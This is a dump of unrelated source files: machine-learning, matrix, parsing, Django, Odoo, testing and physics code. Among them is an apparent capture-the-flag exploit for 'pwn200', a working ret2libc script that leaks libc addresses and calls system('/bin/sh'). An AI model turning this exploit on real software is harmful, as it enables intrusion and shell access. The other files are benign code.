    """
    x_mask = x > 0
    y_mask = y > 0
    total = x_mask.float().sum() + y_mask.float().sum()
    if total == 0.:
        return 1.
    overlap = (x_mask & y_mask).sum().float()
    return 2 * overlap / total
def largest_cc(segmentation):
    """Boolean mask of the largest connected component of `segmentation`."""
    labels = label(segmentation)
    assert(labels.max() != 0)  # assume at least 1 CC
    # Skip bin 0 (background) when picking the most frequent label.
    dominant = np.argmax(np.bincount(labels.flat)[1:]) + 1
    return labels == dominant
|
994,227 | 5f2a8cf700b41d39f3367f2252e9e5f353c115ac | from pycaret.regression import load_model, predict_model
import streamlit as st
import pandas as pd
import numpy as np
model = load_model('deployment_model')
def predict(model, input_df):
    """Score a single-row frame with the pipeline and return its predicted label."""
    scored = predict_model(estimator=model, data=input_df)
    return scored['Label'][0]
def run():
    """Render the Streamlit UI and dispatch online or batch predictions."""
    from PIL import Image
    image = Image.open('logo.jpg')
    image_hospital = Image.open('logo2.jpg')

    st.image(image,use_column_width=False)

    # Sidebar: choose single-record ("Online") or CSV-upload ("Batch") mode.
    add_selectbox = st.sidebar.selectbox(
    "How would you like to predict?",
    ("Online", "Batch"))

    st.sidebar.info('This app is created to predict Airline Passenger Satisfaction')
    st.sidebar.image(image_hospital)

    st.title("Airline Passenger Satisfaction Prediction App")

    if add_selectbox == 'Online':
        # Collect one passenger record from form widgets.
        # NOTE(review): `id` shadows the builtin of the same name.
        id = st.number_input('ID', min_value=1, max_value=10000, value=122)
        Gender = st.selectbox('Gender', ['Male','Female'])
        CustomerType = st.selectbox('Customer Type', ['Loyal Customer','disloyal Customer'])
        Age = st.number_input('Age', min_value=1, max_value=100, value=25)
        TypeofTravel = st.selectbox('Type of Travel', ['Business travel','Personal Travel'])
        Class = st.selectbox('Class', ['Eco','Business','Eco Plus'])
        FlightDistance = st.number_input('Flight Distance', min_value=1, max_value=100000, value=25)
        # 0-5 survey scores for each service aspect.
        Inflightwifiservice = st.selectbox('Inflight wifi service', [0,1,2,3,4,5])
        DepartureArrivaltimeconvenient = st.selectbox('Departure/Arrival time convenient', [0,1,2,3,4,5])
        EaseofOnlinebooking = st.selectbox('Ease of Online booking', [0,1,2,3,4,5])
        Gatelocation = st.selectbox('Gate location', [0,1,2,3,4,5])
        Foodanddrink = st.selectbox('Food and drink', [0,1,2,3,4,5])
        Onlineboarding = st.selectbox('Online boarding', [0,1,2,3,4,5])
        Seatcomfort = st.selectbox('Seat comfort', [0,1,2,3,4,5])
        Inflightentertainment = st.selectbox('Inflight entertainment', [0,1,2,3,4,5])
        Onboardservice = st.selectbox('On-board service', [0,1,2,3,4,5])
        Legroomservice = st.selectbox('Leg room service', [0,1,2,3,4,5])
        Baggagehandling = st.selectbox('Baggage handling', [0,1,2,3,4,5])
        Checkinservice = st.selectbox('Checkin service', [0,1,2,3,4,5])
        Inflightservice = st.selectbox('Inflight service', [0,1,2,3,4,5])
        Cleanliness = st.selectbox('Cleanliness', [0,1,2,3,4,5])
        DepartureDelayinMinutes = st.number_input('Departure Delay in Minutes', min_value=1, max_value=100000, value=25)
        ArrivalDelayinMinutes = st.number_input('Arrival Delay in Minutes', min_value=1, max_value=100000, value=25)

        output=""

        # Assemble the record into a one-row frame the pipeline expects.
        input_dict = {'id':id,'Gender' : Gender, 'CustomerType' : CustomerType, 'Age' : Age, 'TypeofTravel' : TypeofTravel,'Class' : Class,'FlightDistance':FlightDistance,'Inflightwifiservice':Inflightwifiservice,'DepartureArrivaltimeconvenient':DepartureArrivaltimeconvenient ,'EaseofOnlinebooking':EaseofOnlinebooking ,'Gatelocation':Gatelocation ,'Foodanddrink':Foodanddrink,'Onlineboarding':Onlineboarding,'Seatcomfort':Seatcomfort,'Inflightentertainment':Inflightentertainment,'Onboardservice':Onboardservice,'Legroomservice':Legroomservice,'Baggagehandling':Baggagehandling,'Checkinservice':Checkinservice,'Inflightservice':Inflightservice,'Cleanliness':Cleanliness,'DepartureDelayinMinutes':DepartureDelayinMinutes,'ArrivalDelayinMinutes':ArrivalDelayinMinutes}
        input_df = pd.DataFrame([input_dict])

        if st.button("Predict"):
            output = predict(model=model, input_df=input_df)
            output = str(output)

        st.success('The output is {}'.format(output))

    if add_selectbox == 'Batch':
        file_upload = st.file_uploader("Upload csv file for predictions", type=["csv"])

        if file_upload is not None:
            data = pd.read_csv(file_upload)
            predictions = predict_model(estimator=model,data=data)
            st.write(predictions)


if __name__ == '__main__':
    run()
994,228 | d8ab21dfe4aacc5a12ce3c4d3ce557037a8436a4 | import pandas as pd
from coding_the_matrix import Vec
from coding_the_matrix import matutil
from numbers import Number
import numpy as np
def vec_mul_mat(u, M):
    """Row-vector times matrix: a Vec over M's column labels."""
    assert u.D == M.D[0]
    # Dot the vector against each column of the matrix.
    columns = matutil.mat2coldict(M)
    return Vec.Vec(M.D[1], {label: u * col for label, col in columns.items()})
def mat_mul_vec(M, u):
    """Matrix times column-vector: a Vec over M's row labels."""
    assert M.D[1] == u.D
    rows = matutil.mat2rowdict(M)
    return Vec.Vec(M.D[0], {label: row * u for label, row in rows.items()})
def mat_mul_mat(U, V):
    """Matrix times matrix: each result row is (row of U) * V."""
    assert U.D[1] == V.D[0]
    product_rows = {label: row * V
                    for label, row in matutil.mat2rowdict(U).items()}
    return matutil.rowdict2mat(product_rows, col_labels=V.original_labels[1])
def mat_mul_num(M, num):
    """Matrix-by-scalar product via the underlying row vectors."""
    scaled_rows = {label: row * num
                   for label, row in matutil.mat2rowdict(M).items()}
    return matutil.rowdict2mat(scaled_rows, col_labels=M.original_labels[1])
class Mat:
    """Sparse matrix over arbitrary (row, column) label sets.

    D is a pair of label *sets*; f maps (row_label, col_label) -> value,
    with absent keys read as 0.
    """

    def __init__(self, labels, function):
        # Keep the caller's label order for pretty-printing; D holds sets.
        self._original_labels = [item.copy() for item in labels]
        labels = [set(label) for label in labels]
        assert len(labels) == 2
        assert all([isinstance(d, set) for d in labels])
        assert all([isinstance(k, tuple) and len(k) == 2 for k in function.keys()])
        assert all([i in labels[0] and j in labels[1] for (i, j) in function.keys()])
        self.D = labels
        self.f = function

    @property
    def original_labels(self):
        # Ordered labels as originally supplied, unlike the sets in D.
        return self._original_labels

    @property
    def shape(self):
        return len(self.D[0]), len(self.D[1])

    @property
    def max(self):
        # NOTE(review): considers only explicitly stored entries (implicit
        # zeros ignored) and raises on an empty f — confirm intended.
        return max(self.f.values())

    @property
    def min(self):
        return min(self.f.values())

    def copy(self):
        return self.__class__(self.D, self.f.copy())

    def __repr__(self):
        return "Mat({}, {})".format(self.D, self.f)

    def __neg__(self):
        return self.__class__(self._original_labels, {k: -v for k, v in self.f.items()})

    def __eq__(self, other) -> bool:
        """
        Parameters
        ----------
        other : Mat
        """
        # NOTE(review): the attribute accesses below raise AttributeError
        # when `other` is not Mat-like, despite the isinstance check.
        same_class = isinstance(other, Mat)
        same_D = self.D[0] == other.D[0] and self.D[1] == other.D[1]
        same_f = self._sparse_f() == other._sparse_f()
        return same_D and same_f and same_class

    def _sparse_f(self):
        # Drop explicit zeros so equality ignores 0-vs-missing differences.
        return {k: v for k, v in self.f.items() if v != 0}

    def __getitem__(self, value):
        # M[r, c]; absent entries read as 0.
        assert isinstance(value, tuple)
        assert len(value) == 2
        return self.f.get(value, 0)

    def __setitem__(self, key, value):
        assert isinstance(key, tuple)
        assert len(key) == 2
        assert key[0] in self.D[0]
        assert key[1] in self.D[1]
        self.f[key] = value

    def __mul__(self, other):
        """M * u"""
        # NOTE(review): raises NotImplementedError rather than returning
        # NotImplemented, so Python never falls back to other.__rmul__.
        if isinstance(other, Vec.Vec):
            return mat_mul_vec(self, other)
        if isinstance(other, self.__class__):
            return mat_mul_mat(self, other)
        if isinstance(other, Number):
            return mat_mul_num(self, other)
        raise NotImplementedError(f"{type(self)} and {type(other)}")

    def __rmul__(self, other):
        """u * M"""
        if isinstance(other, Vec.Vec):
            return vec_mul_mat(other, self)
        if isinstance(other, Number):
            return mat_mul_num(self, other)
        raise NotImplementedError(f"{type(self)} and {type(other)}")

    def __add__(self, other):
        # add each item if other is matrix
        if isinstance(other, Mat):
            assert other.D == self.D
            return Mat(
                self.D,
                {
                    k: (self[k] + other[k])
                    for k in set(self.f.keys()) | set(other.f.keys())
                },
            )
        return NotImplemented

    def __sub__(self, other):
        if isinstance(other, Mat):
            assert other.D == self.D
            return Mat(
                self.D,
                {
                    k: (self[k] - other[k])
                    for k in set(self.f.keys()) | set(other.f.keys())
                },
            )
        return NotImplemented

    def __str__(self):
        # Render as a table using the caller-supplied label order.
        R, C = self._original_labels
        row_dict = {r: [self.f.get((r, c), 0) for c in C] for r in R}
        df = pd.DataFrame.from_dict(row_dict, orient="index")
        df.columns = C
        return df.to_string()

    def to_pandas(self):
        # NOTE(review): iterates the *sets* in D, so row/column order is
        # arbitrary here (unlike __str__) — confirm intended.
        R, C = self.D
        row_dict = {r: [self.f.get((r, c), 0) for c in C] for r in R}
        df = pd.DataFrame.from_dict(row_dict, orient="index")
        df.columns = C
        return df

    def transpose(self):
        R, C = self.D
        D = (C, R)
        f = {(c, r): v for (r, c), v in self.f.items()}
        return Mat(D, f)

    def pprint(self, rows=None, cols=None):
        """Reorder the matrix (useful for triangular matrices)"""
        df = self.to_pandas()
        R, C = self.D
        if rows is not None:
            assert set(rows) == R
            df = df.loc[rows, :]
        if cols is not None:
            assert set(cols) == C
            df = df.loc[:, cols]
        return df

    def __abs__(self):
        # Frobenius norm over the stored entries.
        return np.sqrt(sum([value ** 2 for value in self.f.values()]))
994,229 | 145064f1444de21c6f652cbf26df25b3c7af9a14 | #! /usr/bin/env python3
import sys
def isLoadStore(instruction: str):
    """True when the disassembled instruction text contains any of the
    data-moving / ALU mnemonic substrings the trace filter cares about."""
    mnemonics = ("mov", "add", "sub", "mul", "sal", "sar", "xor", "and",
                 "or", "inc", "dec", "neg", "not", "shl", "shr", "rol",
                 "ror", "rcl", "rcr", "sto", "lod")
    return any(m in instruction for m in mnemonics)
def filter(input_file, output_file):
    """Parse a disassembly/register trace and write an annotated report.

    Every trace line containing "=>" (an executed instruction) is followed
    by a 24-line "<reg> <value>" register dump, which is read into a dict.
    The instruction's operands are then decoded to compute effective
    addresses, and load/store accesses are appended to a side file named
    "<output>.lsmap".  Returns 0; stops early (noting the crash) when a
    register dump does not start with "rax".
    """
    index = 1
    load_store_map = {}  # NOTE(review): never used — confirm before removing
    load_store_file = output_file.name + ".lsmap"
    lsfile = open(load_store_file, "w")
    output_tuple=("Address", "L/S", "Inst#")
    lsfile.write('{0:<10} {1:>16} {2:>10}\n'.format(*output_tuple))
    is_crashing_inst = False
    while(True):
        line = input_file.readline()
        IsMemAcess = False
        memacctype = -1          # 0 = load (source operand), 1 = store (destination)
        effective_address = -1
        if(not line):
            break
        if(line.find("=>") != -1):
            line = line.strip()
            main_list = line.split()
            # Read the 24-line register dump that follows each instruction.
            register_dict = {}
            for i in range(0,24):
                if is_crashing_inst:
                    break
                line = input_file.readline()
                temp_list = line.split()
                # A dump not starting with rax marks the crashing instruction.
                if i == 0 and temp_list[0] != "rax":
                    is_crashing_inst = True
                register_dict[temp_list[0]] = temp_list[1]
            #print(main_list)
            if is_crashing_inst:
                output_file.write("***CRASHED***\nLast Instruction is :" + main_list[0])
                break
            main_list.pop(0)
            if(len(main_list)<=0):
                continue
            instruction = main_list[0]
            main_list.pop(0)
            output_file.write("Instruction " + str(index)+": " + instruction+ "\n")
            if(len(main_list)> 0):
                # Split "src,dst"; re-join a "disp(base,index,scale)" memory
                # operand whose internal comma got split off.
                main_list = main_list[0].split(",",1)
                if(len(main_list) > 1):
                    if(main_list[0].find("(") != -1 and main_list[1].find(")") != -1):
                        partition = main_list[1][0:main_list[1].find(")")+1]
                        concat = main_list[0] + "," + partition
                        main_list[1] = main_list[1].replace(partition+",","")
                        main_list.pop(0)
                        main_list.insert(0, concat)
                op_index = 0
                output_file.write("Operands: ")
                for operand in main_list:
                    output_file.write(operand)
                    if(op_index == 0 and len(main_list) > 1):
                        output_file.write(", ")
                    if(op_index == 0):
                        # Source operand: displacement / absolute / scaled form.
                        if(operand[0] == '-' or operand[0] == '0' or operand[0] == "*"):
                            operand = operand.replace("%","")
                            operand = operand.replace("(", ",")
                            IsMemAcess = True
                            memacctype = 0
                            operand = operand.replace(")", "")
                            operand = operand.replace("*","")
                            operand = operand.split(",")
                            # NOTE(review): removing while iterating can skip
                            # adjacent empty fields — confirm acceptable.
                            for x in operand:
                                if(x == ''):
                                    operand.remove(x)
                            if(len(operand) > 1):
                                if(operand[1] == ''):
                                    operand.pop(1)
                                base_addr = int(register_dict[operand[1]],16)
                                offset = int(operand[0],16)
                                if(len(operand) == 3):
                                    op_size = int(operand[2],16)
                                    # NOTE(review): scales the base by the
                                    # offset (not by op_size) — confirm intent.
                                    base_addr = base_addr * offset
                                effective_address = base_addr + offset
                                output_file.write(" ---> Effective Address = "+hex(effective_address))
                            else:
                                if(operand[0] in register_dict.keys()):
                                    effective_address = register_dict[operand[0]]
                                else:
                                    effective_address = operand[0]
                                output_file.write(" ---> Effective Address = "+effective_address)
                        # Source operand: "(base,index,scale)" register-indirect form.
                        elif(operand[0] == "("):
                            IsMemAcess = True
                            memacctype = 0
                            operand = operand.replace("(","")
                            operand = operand.replace(")","")
                            operand = operand.replace("%","")
                            operand = operand.split(",")
                            if(len(operand) > 1):
                                base_addr = int(register_dict[operand[0]], 16)
                                offset = int(register_dict[operand[1]], 16)
                                op_size = int(operand[2], 16)
                                effective_address = base_addr + (offset * op_size)
                                output_file.write(" ---> Effective Address = "+hex(effective_address))
                            else:
                                if(operand[0].find("0x") != -1):
                                    effective_address = operand[0]
                                    # NOTE(review): hex() on a str raises
                                    # TypeError — likely latent bug; confirm.
                                    output_file.write(" ---> Effective Address = "+hex(effective_address))
                                else:
                                    effective_address = register_dict[operand[0]]
                                    output_file.write(" ---> Effective Address = "+register_dict[operand[0]])
                    elif(op_index == 1):
                        # Destination operand: a memory form here means a store.
                        if(operand[0] == '-' or operand[0] == '0' or operand[0] == "*"):
                            IsMemAcess = True
                            memacctype = 1
                            operand = operand.replace("%","")
                            operand = operand.replace("(", ",")
                            operand = operand.replace(")", "")
                            operand = operand.replace("*","")
                            operand = operand.split(",")
                            if(len(operand) > 1):
                                if(len(operand) == 2):
                                    base_addr = int(register_dict[operand[1]],16)
                                    offset = int(operand[0],16)
                                    effective_address = base_addr + offset
                                    output_file.write(" ---> Effective Address = "+hex(base_addr+offset))
                                elif(len(operand) == 4):
                                    base_addr = int(register_dict[operand[1]],16)
                                    offset = int(operand[0],16)
                                    mem_index = int(register_dict[operand[2]],16)
                                    mem_sz = int(operand[3],16)
                                    effective_address = base_addr+offset+(mem_index*mem_sz)
                                    output_file.write(" ---> Effective Address = "+hex(effective_address))
                            else:
                                effective_address = operand[0]
                                output_file.write(" ---> Effective Address = "+operand[0])
                    op_index+=1
                output_file.write("\n")
            else:
                output_file.write("NO ARGS\n")
            # Record the access in the .lsmap side file.
            if(IsMemAcess == True):
                if(memacctype == 0 and isLoadStore(instruction)):
                    output_file.write("<------ LOAD OPERATION ------>\n")
                    if isinstance(effective_address, str):
                        output_tuple = (effective_address, "LOAD", str(index))
                    else:
                        output_tuple = (hex(effective_address), "LOAD", str(index))
                    #lsfile.write(hex(effective_address) + " "+"LOAD"+" "+str(index)+"\n")
                    lsfile.write('{0:<10} {1:>13} {2:>10}\n'.format(*output_tuple))
                elif(memacctype == 1 and isLoadStore(instruction)):
                    output_file.write("<------ STORE OPERATION ------>\n")
                    if isinstance(effective_address, str):
                        output_tuple = (effective_address, "STORE", str(index))
                    else:
                        output_tuple = (hex(effective_address), "STORE", str(index))
                    #lsfile.write(hex(effective_address) + " "+"LOAD"+" "+str(index)+"\n")
                    lsfile.write('{0:<10} {1:>13} {2:>10}\n'.format(*output_tuple))
            output_file.write("---------------------------------------\n")
            index +=1
    return 0
def main(argv: list):
    """Entry point: argv = [prog, input_trace_path, output_report_path].

    Returns 0 on success, -1 when the file arguments are missing.
    """
    if(len(argv) < 3):
        print("Missing input and/or output file names")
        return -1
    # Context managers close both files even if filter() raises
    # (the original opened them and never closed either handle).
    with open(argv[1], "r") as infile, open(argv[2], "w") as outfile:
        filter(infile, outfile)
    return 0


if __name__ == "__main__":
    main(sys.argv)
994,230 | 28041a46a3cc302f94edf3cddb14a5b762ab5c4e | # Generated by Django 3.1.3 on 2020-12-15 15:40
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated by Django 3.1.3: adds Ad.Time (defaulting to now) and a
    # nullable Profile.contact_no integer field.

    dependencies = [
        ('api', '0007_profile'),
    ]

    operations = [
        migrations.AddField(
            model_name='ad',
            name='Time',
            field=models.DateTimeField(blank=True, default=django.utils.timezone.now),
        ),
        migrations.AddField(
            model_name='profile',
            name='contact_no',
            field=models.IntegerField(null=True),
        ),
    ]
|
994,231 | 67b1d926d0d0dc1260e811b429480ccee0f81ce8 | # -*- coding: utf-8 -*-
from odoo import models, fields, api
class ProductProduct(models.Model):
    """Extends product.product with service-reminder configuration."""
    _inherit = 'product.product'

    x_service_remind_ids = fields.One2many('product.service.remind', 'product_id', string="Remind Service")
    x_is_remind = fields.Boolean(string="Is remind", default=False)

    def get_config_remind(self, remind_configs):
        """Serialise reminder-config records into a list of plain dicts."""
        return [
            {
                'activity_type_id': cfg.activity_type_id.id,
                'date_number': cfg.date_number,
                'object': cfg.object,
                'repeat': cfg.repeat,
                'period': cfg.period,
                'type': cfg.type,
                'note': cfg.note,
            }
            for cfg in remind_configs
        ]
|
# Copy every element of alist into a fresh list and show the result.
alist = [100, 200, 300, 400, 500]
blist = [value for value in alist]
print(blist)
|
994,233 | e25eb3ecfab44b06322111b47c330dfca2a98770 | from pwn import *
import sys
# Two-stage ret2libc exploit for ./pwn200 (32-bit, Python 2 / pwntools).
if len(sys.argv) == 1 :
    p = process('./pwn200')
else :
    print 'Remote server is disabled'
    exit()

# Gadget
pop_1_ret = 0x8048331  # pops one stack slot then returns (chain cleanup)

# Address
puts_plt = 0x8048360
read_got = 0x804A00C
puts_got = 0x804A010

# Stage 1: overflow the 0x18-byte buffer (+4 for saved ebp); call
# puts(read@got) then puts(puts@got) to leak libc addresses, finally
# return into the vulnerable function (lOL) for a second overflow.
payload = 'A'*(0x18+4)
payload += p32(puts_plt)
payload += p32(pop_1_ret)
payload += p32(read_got)
payload += p32(puts_plt)
payload += p32(0x8048511) # func: lOL
payload += p32(puts_got)

p.recvuntil(':D?\n')
p.write(payload)

# Each leak is the first 4 little-endian bytes of a puts() output line.
read_addr = u32(p.recvline()[:4])
puts_addr = u32(p.recvline()[:4])
print '[Exploit] read = '+hex(read_addr)
print '[Exploit] puts = '+hex(puts_addr)

# libc : libc6_2.29-0ubuntu2_i386
# Offsets below are specific to that libc build.
libc_base = read_addr-0xED7E0
system_addr = libc_base+0x42C00
str_bin_sh_addr = libc_base+0x184B35

# Stage 2: classic system("/bin/sh") frame (4 junk bytes = fake return).
payload = 'A'*(0x18+4)
payload += p32(system_addr)
payload += 'A'*4
payload += p32(str_bin_sh_addr)

p.write(payload)
p.interactive()
|
994,234 | b6123793cd00d49d0866556a5e69ea7513891e8e | from tests.base_case import ChatBotTestCase
from chatterbot.trainers import Trainer
from chatterbot.conversation import Statement
class TrainingTests(ChatBotTestCase):
    """Tests for the base Trainer class behaviour."""

    def setUp(self):
        super().setUp()
        self.trainer = Trainer(self.chatbot)

    def test_trainer_not_set(self):
        # Calling train() on the bare Trainer base is expected to raise.
        with self.assertRaises(Trainer.TrainerInitializationException):
            self.trainer.train()

    def test_generate_export_data(self):
        # Export should pair each statement with its stored response chain.
        self.chatbot.storage.create_many([
            Statement(text='Hello, how are you?'),
            Statement(text='I am good.', in_response_to='Hello, how are you?')
        ])

        data = self.trainer._generate_export_data()

        self.assertEqual(
            [['Hello, how are you?', 'I am good.']], data
        )
994,235 | 37d1e5b7ace4ca7f1c90ed632acdc05dd6593d8e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module is here to make it easy load various text corpuses into other
scripts.
"""
from os import path
from nltk.corpus.reader import PlaintextCorpusReader
pwd = path.curdir
def load_pres_debates():
    """
    Returns the corpus for the presidential debates.
    """
    corpus_root = path.join(pwd, "pres_debates")
    return PlaintextCorpusReader(corpus_root, ".*.txt")
994,236 | 75b0c8bd407c17b6fc5d6bd04e2dd069fed7ad07 | class Solution(object):
def constructArray(self, n, k):
i, j = 1, n
res = []
while i <= j:
res.append(i)
if i != j:
res.append(j)
i+=1
j-=1
res = res[:k-1] + sorted(res[k-1:])
if k>1 and res[k-2]<=n/2:
res = res[:k-1] + res[k-1:][::-1]
return res
|
994,237 | 0afc1fc1f3c8f70ec8f28dfbfbd6b900373074b9 | import gc, const, plotter, file_refs
import numpy as np
from scipy import interpolate
from excel import ExcelReader
# These calculations reference equations in 2 papers:
# "Limitations on Observing Submillimeter and Far Infrared Galaxies" by Denny
# and
# "Fundamental Limits of Detection in the Far Infrared" by Denny et al
# The 1st 4 functions defined calculate BLING(squared) for the backgrounds
# The 3 functions after calculate antenna temperature for the backgrounds(a preliminary step for the BLING functions)
# There is no temperature function for "bling_sub" since those backgrounds have given temperatures in data files
# The functions after that calculate: limiting flux, integration time, and total signal
def bling_sub(freq, temp, resol): #calculates BLING(squared) for "Cosmic Infrared Background", "Galactic Emission", and/or "Zodiacal Emission"
    """Squared BLING for backgrounds given as tabulated antenna temperature.

    Implements Denny eq. 2.15 (without the radical): for each channel centre
    nu, integrate 2*h*k*T(nu')*nu' over the band [nu - nu/(2R), nu + nu/(2R)]
    as a Riemann sum.  The *square* is returned so callers can add several
    backgrounds in quadrature before taking the final square root.

    Parameters: freq [Hz], temp [K] sampled at freq, resol = resolving power R.
    """
    # Linear interpolation of antenna temperature vs. frequency.
    f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1) #linear interpolation of "temp" vs. "freq"
    resol = float(resol)
    # Riemann-sum increment [Hz]: smaller loses smoothness, larger is slower.
    step_size = 1.5e5
    # 2 modes times the h*k constants of eq. 2.15, folded with the step size.
    c = 2 * const.h * const.k * step_size
    # Per-channel integration bounds: column 0 = lower, column 1 = upper.
    int_range = np.zeros((len(freq), 2))
    int_range_length = freq/2/resol
    int_range[:,0]=freq - int_range_length
    int_range[:,1]=freq + int_range_length
    # One sample grid per channel, lazily generated.
    ranges = (np.arange(*(list(i)+[step_size])) for i in int_range)
    # Sum nu*T(nu) over each grid and scale: the band integral per channel.
    blingSUB_squared = np.array([c*np.sum(i*f(i)) for i in ranges])
    return blingSUB_squared
def bling_CMB(freq, resol): #calculates BLING(squared) for "Cosmic Microwave Background"
    """Squared BLING for the Cosmic Microwave Background.

    Builds the Planck intensity (Denny eq. 2.16) at temperature const.T,
    converts it to antenna temperature (eq. 2.7, 2-mode factor of 1/2), then
    integrates per channel exactly as bling_sub does (eq. 2.15, squared).
    """
    resol = float(resol)
    temp = []
    c1 = const.h / (const.k * const.T)  # h/(k*T) factor of eq. 2.16
    c2 = 2 * const.h / (const.c ** 2)   # 2h/c^2 factor of eq. 2.16
    for i in freq:
        denom = np.exp(c1 * i) - 1
        intensity = c2 * (i ** 3)/denom
        # Antenna temperature from intensity, eq. 2.7 (.5 is the mode factor).
        antenna_temp = .5 * intensity * (const.c ** 2)/(const.k * (i**2))
        temp.append(antenna_temp)
    temp = np.array(temp)
    # Band integration: identical machinery to bling_sub.
    f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1)
    step_size = 1.5e5  # Riemann-sum increment [Hz]
    c = 2 * const.h * const.k * step_size
    int_range = np.zeros((len(freq), 2))
    int_range_length = freq/2/resol
    int_range[:,0]=freq - int_range_length
    int_range[:,1]=freq + int_range_length
    ranges = (np.arange(*(list(i)+[step_size])) for i in int_range)
    blingCMB_squared = np.array([c*np.sum(i*f(i)) for i in ranges])
    return blingCMB_squared
def bling_AR(freq, rad, resol): #calculates BLING(squared) for "Atmospheric Radiance"
    """Return the squared BLING (background-limited noise) for Atmospheric Radiance.

    Parameters:
        freq: array of frequencies [Hz]
        rad: atmospheric radiance sampled at `freq`
             (file units W/cm^2/st/cm^-1; converted to SI below)
        resol: spectral resolution R; each band integrates over freq/R

    Steps: (1) interpolate radiance vs. frequency, (2) convert radiance to
    antenna temperature (Denny eq. 2.7), (3) integrate over each resolution
    band to get BLING^2 (Denny eq. 2.15). The square root is deliberately
    NOT taken here: the caller adds several backgrounds' squared BLINGs in
    quadrature and roots once.
    """
    ## 1) Interpolate radiance vs. frequency
    rad = rad / (3e6) #file units W/cm^2/st/cm^-1 -> W/m^2/st/Hz; factor follows the radiance files' convention — TODO confirm
    rad = interpolate.InterpolatedUnivariateSpline(freq, rad, k=1) #linear interpolation of "rad" vs. "freq"
    ## 2) Calculate antenna temperature from radiance
    temp = [] #antenna temperature at each frequency
    for i in freq:
        antenna_temp = .5 * rad(i) * (const.c ** 2)/(const.k * (i**2)) #Denny eq. 2.7; the .5 selects one of 2 polarization modes
        temp.append(antenna_temp)
    temp = np.array(temp)
    ## 3) Calculate BLING(squared) from antenna temperature
    f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1) #linear interpolation of "temp" vs. "freq"
    step_size = 1.5e5 #Riemann-sum increment [Hz]; smaller is smoother but slower
    c = const.h * const.k * step_size #constants of Denny eq. 2.15 (without the radical)
    # NOTE(review): bling_CMB and bling_TME use 2*h*k here (2 polarization modes);
    # confirm the missing factor of 2 in this function is intentional.
    int_range = np.zeros((len(freq), 2)) #per-frequency [lower, upper] integration bounds
    int_range_length = freq/2/resol #half-bandwidth nu/(2R) from Denny eq. 2.15
    int_range[:,0]=freq - int_range_length #lower integration bound
    int_range[:,1]=freq + int_range_length #upper integration bound
    ranges = (np.arange(*(list(i)+[step_size])) for i in int_range) #sample points for each band, spaced by step_size
    blingAR_squared = np.array([c*np.sum(i*f(i)) for i in ranges]) #Riemann sum of nu*T(nu) over each band, times constants
    #not square-rooted: the caller adds the squared BLINGs of all backgrounds in quadrature first
    return blingAR_squared
def bling_TME(freq, resol, sigma, mirror_temp, wavelength): #calculates BLING(squared) for "Thermal Mirror Emission"
    """Return the squared BLING for Thermal Mirror Emission.

    Parameters:
        freq: array of frequencies [Hz]
        resol: spectral resolution R (sets the integration bandwidth freq/R)
        sigma: surface electrical conductivity of the mirror metal
        mirror_temp: physical mirror temperature [K]
        wavelength: array of wavelengths [microns] paired with `freq`

    Steps: (1) emissivity from conductivity (Denny eq. 2.17),
    (2) effective temperature from emissivity and mirror temperature
    (Denny eq. 2.20), (3) band integration for BLING^2 (Denny eq. 2.15).
    Result is NOT square-rooted so backgrounds can be added in quadrature.
    """
    ## 1) Calculate emissivity from surface electrical conductivity("sigma") of specific metal
    em = [] #emissivity per wavelength
    w_l = wavelength * (1e-6) #convert wavelength from microns to meters
    c1 = 16 * np.pi * const.c * const.epsilon / sigma #constants of Denny eq. 2.17
    for i in w_l:
        emis = (c1 / i)**.5 #Denny eq. 2.17: emissivity ~ sqrt(const / wavelength)
        em.append(emis)
    em = np.array(em)
    ## 2) Calculate effective temperature from emissivity and mirror temperature
    effective_temp = []
    mirror_temp = float(mirror_temp) #ensure float arithmetic below
    f = interpolate.InterpolatedUnivariateSpline(freq, em, k=1) #linear interpolation of "em" vs. "freq"
    c2 = const.h / (const.k * mirror_temp) #constant of Denny eq. 2.20
    c3 = const.h / const.k #constant of Denny eq. 2.20
    for i in freq:
        denom = np.exp(c2 * i) - 1 #denominator of Denny eq. 2.20
        temp_eff = .5 * f(i) * i * c3 / denom #Denny eq. 2.20; the .5 selects one of 2 polarization modes
        effective_temp.append(temp_eff)
    temp = np.array(effective_temp)
    ## 3) Calculate BLING(squared) from effective temperature
    f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1) #linear interpolation of "temp" vs. "freq"
    step_size = 1.5e5 #Riemann-sum increment [Hz]; smaller is smoother but slower
    c = 2 * const.h * const.k * step_size #2 polarization modes times the constants of Denny eq. 2.15 (without the radical)
    int_range = np.zeros((len(freq), 2)) #per-frequency [lower, upper] integration bounds
    int_range_length = freq/2/resol #half-bandwidth nu/(2R) from Denny eq. 2.15
    int_range[:,0]=freq - int_range_length #lower integration bound
    int_range[:,1]=freq + int_range_length #upper integration bound
    ranges = (np.arange(*(list(i)+[step_size])) for i in int_range) #sample points for each band, spaced by step_size
    blingTME_squared = np.array([c*np.sum(i*f(i)) for i in ranges]) #Riemann sum of nu*T(nu) over each band, times constants
    #not square-rooted: the caller adds the squared BLINGs of all backgrounds in quadrature first
    return blingTME_squared
def temp_TME(freq, sigma, mirror_temp, wavelength): #calculates antenna temperature for "Thermal Mirror Emission"
    """Return the effective antenna temperature array for Thermal Mirror Emission.

    Same emissivity/effective-temperature computation as bling_TME, minus
    the band-integration step.
    """
    ## 1) Calculate emissivity from surface electrical conductivity("sigma") of specific metal
    em = [] #emissivity per wavelength
    w_l = wavelength * (1e-6) #convert wavelength from microns to meters
    c1 = 16 * np.pi * const.c * const.epsilon / sigma #constants of Denny eq. 2.17
    for i in w_l:
        emis = (c1 / i)**.5 #Denny eq. 2.17: emissivity ~ sqrt(const / wavelength)
        em.append(emis)
    em = np.array(em)
    ## 2) Calculate effective temperature from emissivity and mirror temperature
    effective_temp = []
    mirror_temp = float(mirror_temp) #ensure float arithmetic below
    f = interpolate.InterpolatedUnivariateSpline(freq, em, k=1) #linear interpolation of "em" vs. "freq"
    c2 = const.h / (const.k * mirror_temp) #constant of Denny eq. 2.20
    c3 = const.h / const.k #constant of Denny eq. 2.20
    for i in freq:
        denom = np.exp(c2 * i) - 1 #denominator of Denny eq. 2.20
        temp_eff = f(i) * i * c3 / denom #Denny eq. 2.20
        # NOTE(review): bling_TME applies a 0.5 single-polarization factor at this
